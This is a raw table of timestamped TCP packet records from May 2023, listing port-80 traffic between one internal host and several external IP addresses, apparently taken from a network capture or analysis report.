                                                                                                                    May 30, 2023 11:12:24.052638054 CEST8049837199.192.30.147192.168.11.20
                                                                                                                    May 30, 2023 11:12:24.052691936 CEST8049837199.192.30.147192.168.11.20
                                                                                                                    May 30, 2023 11:12:24.052738905 CEST4983780192.168.11.20199.192.30.147
                                                                                                                    May 30, 2023 11:12:24.052778006 CEST8049837199.192.30.147192.168.11.20
                                                                                                                    May 30, 2023 11:12:24.052875042 CEST4983780192.168.11.20199.192.30.147
                                                                                                                    May 30, 2023 11:12:24.053073883 CEST4983780192.168.11.20199.192.30.147
                                                                                                                    May 30, 2023 11:12:24.913928986 CEST4983780192.168.11.20199.192.30.147
                                                                                                                    May 30, 2023 11:12:25.929368019 CEST4983880192.168.11.20199.192.30.147
                                                                                                                    May 30, 2023 11:12:26.099410057 CEST8049838199.192.30.147192.168.11.20
                                                                                                                    May 30, 2023 11:12:26.099575996 CEST4983880192.168.11.20199.192.30.147
                                                                                                                    May 30, 2023 11:12:26.099682093 CEST4983880192.168.11.20199.192.30.147
                                                                                                                    May 30, 2023 11:12:26.269227028 CEST8049838199.192.30.147192.168.11.20
                                                                                                                    May 30, 2023 11:12:26.380362988 CEST8049838199.192.30.147192.168.11.20
                                                                                                                    May 30, 2023 11:12:26.380444050 CEST8049838199.192.30.147192.168.11.20
                                                                                                                    May 30, 2023 11:12:26.380503893 CEST8049838199.192.30.147192.168.11.20
                                                                                                                    May 30, 2023 11:12:26.380557060 CEST8049838199.192.30.147192.168.11.20
                                                                                                                    May 30, 2023 11:12:26.380604982 CEST8049838199.192.30.147192.168.11.20
                                                                                                                    May 30, 2023 11:12:26.380721092 CEST4983880192.168.11.20199.192.30.147
                                                                                                                    May 30, 2023 11:12:26.380722046 CEST4983880192.168.11.20199.192.30.147
                                                                                                                    May 30, 2023 11:12:26.380780935 CEST4983880192.168.11.20199.192.30.147
                                                                                                                    May 30, 2023 11:12:26.381025076 CEST4983880192.168.11.20199.192.30.147
                                                                                                                    May 30, 2023 11:12:26.550489902 CEST8049838199.192.30.147192.168.11.20
                                                                                                                    May 30, 2023 11:12:31.397217035 CEST4983980192.168.11.20130.185.109.77
                                                                                                                    May 30, 2023 11:12:31.407958031 CEST8049839130.185.109.77192.168.11.20
                                                                                                                    May 30, 2023 11:12:31.408246994 CEST4983980192.168.11.20130.185.109.77
                                                                                                                    May 30, 2023 11:12:31.408299923 CEST4983980192.168.11.20130.185.109.77
                                                                                                                    May 30, 2023 11:12:31.419111013 CEST8049839130.185.109.77192.168.11.20
                                                                                                                    May 30, 2023 11:12:31.419176102 CEST8049839130.185.109.77192.168.11.20
                                                                                                                    May 30, 2023 11:12:31.419224024 CEST8049839130.185.109.77192.168.11.20
                                                                                                                    May 30, 2023 11:12:31.419487953 CEST4983980192.168.11.20130.185.109.77
                                                                                                                    May 30, 2023 11:12:32.912208080 CEST4983980192.168.11.20130.185.109.77
                                                                                                                    May 30, 2023 11:12:33.927634001 CEST4984080192.168.11.20130.185.109.77
                                                                                                                    May 30, 2023 11:12:33.939047098 CEST8049840130.185.109.77192.168.11.20
                                                                                                                    May 30, 2023 11:12:33.939299107 CEST4984080192.168.11.20130.185.109.77
                                                                                                                    May 30, 2023 11:12:33.939418077 CEST4984080192.168.11.20130.185.109.77
                                                                                                                    May 30, 2023 11:12:33.950990915 CEST8049840130.185.109.77192.168.11.20
                                                                                                                    May 30, 2023 11:12:33.951101065 CEST8049840130.185.109.77192.168.11.20
                                                                                                                    May 30, 2023 11:12:33.951143980 CEST8049840130.185.109.77192.168.11.20
                                                                                                                    May 30, 2023 11:12:33.951366901 CEST4984080192.168.11.20130.185.109.77
                                                                                                                    May 30, 2023 11:12:35.442874908 CEST4984080192.168.11.20130.185.109.77
                                                                                                                    May 30, 2023 11:12:36.458462954 CEST4984180192.168.11.20130.185.109.77
                                                                                                                    May 30, 2023 11:12:36.468750954 CEST8049841130.185.109.77192.168.11.20
                                                                                                                    May 30, 2023 11:12:36.468940020 CEST4984180192.168.11.20130.185.109.77
                                                                                                                    May 30, 2023 11:12:36.469614983 CEST4984180192.168.11.20130.185.109.77
                                                                                                                    May 30, 2023 11:12:36.480005980 CEST8049841130.185.109.77192.168.11.20
                                                                                                                    May 30, 2023 11:12:36.480197906 CEST8049841130.185.109.77192.168.11.20
                                                                                                                    May 30, 2023 11:12:36.480214119 CEST4984180192.168.11.20130.185.109.77
                                                                                                                    May 30, 2023 11:12:36.480380058 CEST8049841130.185.109.77192.168.11.20
                                                                                                                    May 30, 2023 11:12:36.480386972 CEST4984180192.168.11.20130.185.109.77
                                                                                                                    May 30, 2023 11:12:36.480588913 CEST4984180192.168.11.20130.185.109.77
                                                                                                                    May 30, 2023 11:12:36.480588913 CEST4984180192.168.11.20130.185.109.77
                                                                                                                    May 30, 2023 11:12:36.480657101 CEST8049841130.185.109.77192.168.11.20
                                                                                                                    May 30, 2023 11:12:36.480720043 CEST4984180192.168.11.20130.185.109.77
                                                                                                                    May 30, 2023 11:12:36.480758905 CEST8049841130.185.109.77192.168.11.20
                                                                                                                    May 30, 2023 11:12:36.480889082 CEST4984180192.168.11.20130.185.109.77
                                                                                                                    May 30, 2023 11:12:36.481101990 CEST4984180192.168.11.20130.185.109.77
                                                                                                                    May 30, 2023 11:12:36.490766048 CEST8049841130.185.109.77192.168.11.20
                                                                                                                    May 30, 2023 11:12:36.490813971 CEST8049841130.185.109.77192.168.11.20
                                                                                                                    May 30, 2023 11:12:36.491025925 CEST4984180192.168.11.20130.185.109.77
                                                                                                                    May 30, 2023 11:12:36.491087914 CEST8049841130.185.109.77192.168.11.20
                                                                                                                    May 30, 2023 11:12:36.491110086 CEST4984180192.168.11.20130.185.109.77
                                                                                                                    May 30, 2023 11:12:36.491215944 CEST8049841130.185.109.77192.168.11.20
                                                                                                                    May 30, 2023 11:12:36.491451025 CEST4984180192.168.11.20130.185.109.77
                                                                                                                    May 30, 2023 11:12:36.491492033 CEST8049841130.185.109.77192.168.11.20
                                                                                                                    May 30, 2023 11:12:36.491620064 CEST8049841130.185.109.77192.168.11.20
                                                                                                                    May 30, 2023 11:12:36.491898060 CEST8049841130.185.109.77192.168.11.20
                                                                                                                    May 30, 2023 11:12:36.491992950 CEST8049841130.185.109.77192.168.11.20
                                                                                                                    May 30, 2023 11:12:36.492265940 CEST8049841130.185.109.77192.168.11.20
                                                                                                                    May 30, 2023 11:12:36.501607895 CEST8049841130.185.109.77192.168.11.20
                                                                                                                    May 30, 2023 11:12:36.501737118 CEST8049841130.185.109.77192.168.11.20
                                                                                                                    May 30, 2023 11:12:36.501991987 CEST8049841130.185.109.77192.168.11.20
                                                                                                                    May 30, 2023 11:12:36.502161026 CEST8049841130.185.109.77192.168.11.20
                                                                                                                    May 30, 2023 11:12:36.502422094 CEST8049841130.185.109.77192.168.11.20
                                                                                                                    May 30, 2023 11:12:36.502583027 CEST8049841130.185.109.77192.168.11.20
                                                                                                                    May 30, 2023 11:12:36.502783060 CEST8049841130.185.109.77192.168.11.20
                                                                                                                    May 30, 2023 11:12:36.503040075 CEST4984180192.168.11.20130.185.109.77
                                                                                                                    May 30, 2023 11:12:37.973505020 CEST4984180192.168.11.20130.185.109.77
                                                                                                                    May 30, 2023 11:12:38.989070892 CEST4984280192.168.11.20130.185.109.77
                                                                                                                    May 30, 2023 11:12:39.000852108 CEST8049842130.185.109.77192.168.11.20
                                                                                                                    May 30, 2023 11:12:39.001115084 CEST4984280192.168.11.20130.185.109.77
                                                                                                                    May 30, 2023 11:12:39.001168013 CEST4984280192.168.11.20130.185.109.77
                                                                                                                    May 30, 2023 11:12:39.012764931 CEST8049842130.185.109.77192.168.11.20
                                                                                                                    May 30, 2023 11:12:39.012849092 CEST8049842130.185.109.77192.168.11.20
                                                                                                                    May 30, 2023 11:12:39.012913942 CEST8049842130.185.109.77192.168.11.20
                                                                                                                    May 30, 2023 11:12:39.013329029 CEST4984280192.168.11.20130.185.109.77
                                                                                                                    May 30, 2023 11:12:39.013387918 CEST4984280192.168.11.20130.185.109.77
                                                                                                                    May 30, 2023 11:12:39.025389910 CEST8049842130.185.109.77192.168.11.20
                                                                                                                    May 30, 2023 11:12:44.019706964 CEST4984380192.168.11.20216.108.231.108
                                                                                                                    May 30, 2023 11:12:44.175354004 CEST8049843216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:12:44.175539970 CEST4984380192.168.11.20216.108.231.108
                                                                                                                    May 30, 2023 11:12:44.175649881 CEST4984380192.168.11.20216.108.231.108
                                                                                                                    May 30, 2023 11:12:44.330996990 CEST8049843216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:12:45.128420115 CEST8049843216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:12:45.128462076 CEST8049843216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:12:45.128724098 CEST4984380192.168.11.20216.108.231.108
                                                                                                                    May 30, 2023 11:12:45.690604925 CEST4984380192.168.11.20216.108.231.108
                                                                                                                    May 30, 2023 11:12:46.706294060 CEST4984480192.168.11.20216.108.231.108
                                                                                                                    May 30, 2023 11:12:46.864109039 CEST8049844216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:12:46.864379883 CEST4984480192.168.11.20216.108.231.108
                                                                                                                    May 30, 2023 11:12:46.864459991 CEST4984480192.168.11.20216.108.231.108
                                                                                                                    May 30, 2023 11:12:47.021934032 CEST8049844216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:12:47.879964113 CEST8049844216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:12:47.879982948 CEST8049844216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:12:47.880218983 CEST4984480192.168.11.20216.108.231.108
                                                                                                                    May 30, 2023 11:12:48.377396107 CEST4984480192.168.11.20216.108.231.108
                                                                                                                    May 30, 2023 11:12:49.393065929 CEST4984580192.168.11.20216.108.231.108
                                                                                                                    May 30, 2023 11:12:49.550573111 CEST8049845216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:12:49.550792933 CEST4984580192.168.11.20216.108.231.108
                                                                                                                    May 30, 2023 11:12:49.551434040 CEST4984580192.168.11.20216.108.231.108
                                                                                                                    May 30, 2023 11:12:49.551518917 CEST4984580192.168.11.20216.108.231.108
                                                                                                                    May 30, 2023 11:12:49.709045887 CEST8049845216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:12:49.709111929 CEST8049845216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:12:49.709157944 CEST8049845216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:12:49.709198952 CEST8049845216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:12:49.709243059 CEST4984580192.168.11.20216.108.231.108
                                                                                                                    May 30, 2023 11:12:49.709300041 CEST8049845216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:12:49.709340096 CEST4984580192.168.11.20216.108.231.108
                                                                                                                    May 30, 2023 11:12:49.709387064 CEST8049845216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:12:49.709533930 CEST4984580192.168.11.20216.108.231.108
                                                                                                                    May 30, 2023 11:12:49.709681988 CEST4984580192.168.11.20216.108.231.108
                                                                                                                    May 30, 2023 11:12:49.866827011 CEST8049845216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:12:49.866894960 CEST8049845216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:12:49.866952896 CEST8049845216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:12:49.866996050 CEST8049845216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:12:49.867014885 CEST4984580192.168.11.20216.108.231.108
                                                                                                                    May 30, 2023 11:12:49.867060900 CEST4984580192.168.11.20216.108.231.108
                                                                                                                    May 30, 2023 11:12:49.867086887 CEST8049845216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:12:49.867113113 CEST4984580192.168.11.20216.108.231.108
                                                                                                                    May 30, 2023 11:12:49.867153883 CEST8049845216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:12:49.867194891 CEST8049845216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:12:49.867237091 CEST8049845216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:12:49.867279053 CEST8049845216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:12:49.867295980 CEST4984580192.168.11.20216.108.231.108
                                                                                                                    May 30, 2023 11:12:49.867379904 CEST8049845216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:12:49.867420912 CEST8049845216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:12:49.867707968 CEST8049845216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:12:49.867749929 CEST8049845216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:12:49.908225060 CEST8049845216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:12:50.024991035 CEST8049845216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:12:50.025096893 CEST8049845216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:12:50.025149107 CEST8049845216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:12:50.025263071 CEST8049845216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:12:50.025309086 CEST8049845216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:12:50.549453974 CEST8049845216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:12:50.549534082 CEST8049845216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:12:50.549736977 CEST4984580192.168.11.20216.108.231.108
                                                                                                                    May 30, 2023 11:12:51.064304113 CEST4984580192.168.11.20216.108.231.108
                                                                                                                    May 30, 2023 11:12:52.079905033 CEST4984680192.168.11.20216.108.231.108
                                                                                                                    May 30, 2023 11:12:52.237302065 CEST8049846216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:12:52.237648010 CEST4984680192.168.11.20216.108.231.108
                                                                                                                    May 30, 2023 11:12:52.237648010 CEST4984680192.168.11.20216.108.231.108
                                                                                                                    May 30, 2023 11:12:52.395180941 CEST8049846216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:12:52.926728964 CEST8049846216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:12:52.926795959 CEST8049846216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:12:52.927028894 CEST4984680192.168.11.20216.108.231.108
                                                                                                                    May 30, 2023 11:12:52.927207947 CEST4984680192.168.11.20216.108.231.108
                                                                                                                    May 30, 2023 11:12:53.084264994 CEST8049846216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:12:57.938106060 CEST4984780192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:12:58.207385063 CEST8049847183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:12:58.207631111 CEST4984780192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:12:58.207803011 CEST4984780192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:12:58.476886034 CEST8049847183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:12:58.478796005 CEST8049847183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:12:58.478858948 CEST8049847183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:12:58.478905916 CEST8049847183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:12:58.479110003 CEST4984780192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:12:58.479110003 CEST4984780192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:12:59.718791962 CEST4984780192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:13:00.734344959 CEST4984880192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:13:00.998394966 CEST8049848183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:13:00.998608112 CEST4984880192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:13:00.998691082 CEST4984880192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:13:01.262629986 CEST8049848183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:13:01.264862061 CEST8049848183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:13:01.264940977 CEST8049848183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:13:01.264991999 CEST8049848183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:13:01.265090942 CEST4984880192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:13:01.265249014 CEST4984880192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:13:02.499424934 CEST4984880192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:13:03.515091896 CEST4984980192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:13:03.782139063 CEST8049849183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:13:03.782407999 CEST4984980192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:13:03.783010960 CEST4984980192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:13:03.783097982 CEST4984980192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:13:04.049941063 CEST8049849183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:13:04.050013065 CEST8049849183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:13:04.050056934 CEST8049849183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:13:04.050096035 CEST8049849183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:13:04.050211906 CEST4984980192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:13:04.050297976 CEST4984980192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:13:04.050398111 CEST8049849183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:13:04.050477028 CEST8049849183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:13:04.050523043 CEST8049849183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:13:04.050606012 CEST4984980192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:13:04.050776958 CEST4984980192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:13:04.050951004 CEST4984980192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:13:04.317303896 CEST8049849183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:13:04.317373037 CEST8049849183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:13:04.317418098 CEST8049849183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:13:04.317457914 CEST8049849183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:13:04.317523003 CEST4984980192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:13:04.317718983 CEST4984980192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:13:04.317760944 CEST8049849183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:13:04.317821980 CEST8049849183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:13:04.317827940 CEST4984980192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:13:04.317867041 CEST8049849183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:13:04.317908049 CEST8049849183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:13:04.318074942 CEST8049849183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:13:04.318116903 CEST8049849183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:13:04.318156958 CEST8049849183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:13:04.318319082 CEST8049849183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:13:04.318387985 CEST8049849183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:13:04.318429947 CEST8049849183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:13:04.584826946 CEST8049849183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:13:04.584908962 CEST8049849183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:13:04.584952116 CEST8049849183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:13:04.584995985 CEST8049849183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:13:04.585077047 CEST8049849183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:13:04.585422993 CEST8049849183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:13:04.585484982 CEST8049849183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:13:04.585529089 CEST8049849183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:13:04.587376118 CEST8049849183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:13:04.587444067 CEST8049849183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:13:04.587498903 CEST8049849183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:13:04.587687016 CEST4984980192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:13:04.587759018 CEST4984980192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:13:05.295592070 CEST4984980192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:13:06.311213970 CEST4985080192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:13:06.595031977 CEST8049850183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:13:06.595199108 CEST4985080192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:13:06.595299006 CEST4985080192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:13:06.879324913 CEST8049850183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:13:06.880937099 CEST8049850183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:13:06.881012917 CEST8049850183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:13:06.881069899 CEST8049850183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:13:06.881326914 CEST4985080192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:13:06.881326914 CEST4985080192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:13:06.881479979 CEST4985080192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:13:07.165352106 CEST8049850183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:13:11.888194084 CEST4985180192.168.11.2084.32.84.32
                                                                                                                    May 30, 2023 11:13:11.916810036 CEST804985184.32.84.32192.168.11.20
                                                                                                                    May 30, 2023 11:13:11.917068005 CEST4985180192.168.11.2084.32.84.32
                                                                                                                    May 30, 2023 11:13:11.917148113 CEST4985180192.168.11.2084.32.84.32
                                                                                                                    May 30, 2023 11:13:11.945844889 CEST804985184.32.84.32192.168.11.20
                                                                                                                    May 30, 2023 11:13:11.945910931 CEST804985184.32.84.32192.168.11.20
                                                                                                                    May 30, 2023 11:13:14.434525013 CEST4985280192.168.11.2084.32.84.32
                                                                                                                    May 30, 2023 11:13:14.463259935 CEST804985284.32.84.32192.168.11.20
                                                                                                                    May 30, 2023 11:13:14.463537931 CEST4985280192.168.11.2084.32.84.32
                                                                                                                    May 30, 2023 11:13:14.463608980 CEST4985280192.168.11.2084.32.84.32
                                                                                                                    May 30, 2023 11:13:14.492343903 CEST804985284.32.84.32192.168.11.20
                                                                                                                    May 30, 2023 11:13:14.492408991 CEST804985284.32.84.32192.168.11.20
                                                                                                                    May 30, 2023 11:13:16.980870962 CEST4985380192.168.11.2084.32.84.32
                                                                                                                    May 30, 2023 11:13:17.008618116 CEST804985384.32.84.32192.168.11.20
                                                                                                                    May 30, 2023 11:13:17.008848906 CEST4985380192.168.11.2084.32.84.32
                                                                                                                    May 30, 2023 11:13:17.009413958 CEST4985380192.168.11.2084.32.84.32
                                                                                                                    May 30, 2023 11:13:17.009474039 CEST4985380192.168.11.2084.32.84.32
                                                                                                                    May 30, 2023 11:13:17.037353992 CEST804985384.32.84.32192.168.11.20
                                                                                                                    May 30, 2023 11:13:17.037434101 CEST804985384.32.84.32192.168.11.20
                                                                                                                    May 30, 2023 11:13:17.037579060 CEST804985384.32.84.32192.168.11.20
                                                                                                                    May 30, 2023 11:13:17.037585020 CEST4985380192.168.11.2084.32.84.32
                                                                                                                    May 30, 2023 11:13:17.037662983 CEST4985380192.168.11.2084.32.84.32
                                                                                                                    May 30, 2023 11:13:17.037678003 CEST804985384.32.84.32192.168.11.20
                                                                                                                    May 30, 2023 11:13:17.065581083 CEST804985384.32.84.32192.168.11.20
                                                                                                                    May 30, 2023 11:13:17.065655947 CEST804985384.32.84.32192.168.11.20
                                                                                                                    May 30, 2023 11:13:17.065954924 CEST804985384.32.84.32192.168.11.20
                                                                                                                    May 30, 2023 11:13:17.066036940 CEST804985384.32.84.32192.168.11.20
                                                                                                                    May 30, 2023 11:13:19.527074099 CEST4985480192.168.11.2084.32.84.32
                                                                                                                    May 30, 2023 11:13:19.554853916 CEST804985484.32.84.32192.168.11.20
                                                                                                                    May 30, 2023 11:13:19.555116892 CEST4985480192.168.11.2084.32.84.32
                                                                                                                    May 30, 2023 11:13:19.555170059 CEST4985480192.168.11.2084.32.84.32
                                                                                                                    May 30, 2023 11:13:19.582983971 CEST804985484.32.84.32192.168.11.20
                                                                                                                    May 30, 2023 11:13:19.583468914 CEST804985484.32.84.32192.168.11.20
                                                                                                                    May 30, 2023 11:13:19.583544016 CEST804985484.32.84.32192.168.11.20
                                                                                                                    May 30, 2023 11:13:19.583602905 CEST804985484.32.84.32192.168.11.20
                                                                                                                    May 30, 2023 11:13:19.583658934 CEST804985484.32.84.32192.168.11.20
                                                                                                                    May 30, 2023 11:13:19.583714008 CEST804985484.32.84.32192.168.11.20
                                                                                                                    May 30, 2023 11:13:19.583767891 CEST804985484.32.84.32192.168.11.20
                                                                                                                    May 30, 2023 11:13:19.583823919 CEST804985484.32.84.32192.168.11.20
                                                                                                                    May 30, 2023 11:13:19.583879948 CEST804985484.32.84.32192.168.11.20
                                                                                                                    May 30, 2023 11:13:19.583930016 CEST804985484.32.84.32192.168.11.20
                                                                                                                    May 30, 2023 11:13:19.583976030 CEST4985480192.168.11.2084.32.84.32
                                                                                                                    May 30, 2023 11:13:19.584381104 CEST4985480192.168.11.2084.32.84.32
                                                                                                                    May 30, 2023 11:13:19.584539890 CEST4985480192.168.11.2084.32.84.32
                                                                                                                    May 30, 2023 11:13:19.612200975 CEST804985484.32.84.32192.168.11.20
                                                                                                                    May 30, 2023 11:13:24.588543892 CEST4985580192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:13:24.635310888 CEST8049855185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:13:24.635531902 CEST4985580192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:13:24.635586977 CEST4985580192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:13:24.682348013 CEST8049855185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:13:24.682410955 CEST8049855185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:13:24.682457924 CEST8049855185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:13:24.682702065 CEST4985580192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:13:26.150465012 CEST4985580192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:13:27.166099072 CEST4985680192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:13:27.212661028 CEST8049856185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:13:27.212902069 CEST4985680192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:13:27.212985992 CEST4985680192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:13:27.259565115 CEST8049856185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:13:27.259865999 CEST8049856185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:13:27.259890079 CEST8049856185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:13:27.260036945 CEST4985680192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:13:28.728117943 CEST4985680192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:13:29.743669033 CEST4985780192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:13:29.790710926 CEST8049857185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:13:29.790982008 CEST4985780192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:13:29.791526079 CEST4985780192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:13:29.791605949 CEST4985780192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:13:29.838426113 CEST8049857185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:13:29.838500023 CEST8049857185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:13:29.838541985 CEST8049857185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:13:29.838582993 CEST8049857185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:13:29.838624001 CEST8049857185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:13:29.838665009 CEST8049857185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:13:29.838705063 CEST8049857185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:13:29.838743925 CEST8049857185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:13:29.838769913 CEST4985780192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:13:29.838783979 CEST8049857185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:13:29.838898897 CEST4985780192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:13:29.838962078 CEST4985780192.168.11.20185.106.208.3
